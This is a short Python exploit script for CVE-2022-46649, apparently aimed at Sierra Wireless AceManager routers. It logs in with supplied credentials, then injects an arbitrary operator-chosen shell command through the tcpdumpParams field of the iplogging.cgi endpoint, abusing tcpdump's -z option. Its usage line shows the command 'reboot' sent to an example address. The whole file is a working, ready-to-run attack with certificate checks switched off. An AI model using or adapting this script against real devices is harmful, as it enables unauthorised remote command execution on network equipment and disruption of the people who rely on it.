#!/usr/bin/env python3
# CVE-2022-46649
# OS Command Injection via /cgi-bin/iplogging.cgi

import requests
import urllib3
import sys

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

def login(host, port, username, password):
    login_url = f"https://{host}:{port}/xml/Connect.xml"
    xml_payload = f"""
    <request xmlns="urn:acemanager">
        <connect>
            <login>{username}</login>
            <password><![CDATA[{password}]]></password>
        </connect>
    </request>
    """.strip()
    headers = {"Content-Type": "application/xml"}
    session = requests.Session()
    try:
        r = session.post(login_url, data=xml_payload, headers=headers, verify=False, timeout=10)
        if r.status_code == 200 and "OK" in r.text:
            print("[+] Logged in successfully.")
            return session
        else:
            print("[-] Login failed.")
            sys.exit(1)
    except Exception as e:
        print(f"[-] Connection error: {e}")
        sys.exit(1)

def exploit(host, port, session, injected_cmd):
    exploit_url = f"https://{host}:{port}/admin/tools/iplogging.cgi"
    payload = {
        "tcpdumpParams": f"-i eth0 -G 1 -z{injected_cmd}",
        "stateRequest": "start"
    }
    try:
        r = session.post(exploit_url, data=payload, verify=False, timeout=10)
        if r.status_code == 200:
            print(f"[+] Payload sent successfully. Injected command: {injected_cmd}")
        else:
            print(f"[-] Exploit failed. HTTP {r.status_code}")
    except Exception as e:
        print(f"[-] Exploit error: {e}")

if __name__ == "__main__":
    if len(sys.argv) != 6:
        print(f"Usage: {sys.argv[0]} <host> <port> <username> <password> <command>")
        print(f"Example: {sys.argv[0]} 192.168.13.1 9443 admin admin reboot")
        sys.exit(1)

    host, port, user, pwd, cmd = sys.argv[1:]
    session = login(host, port, user, pwd)
    exploit(host, port, session, cmd)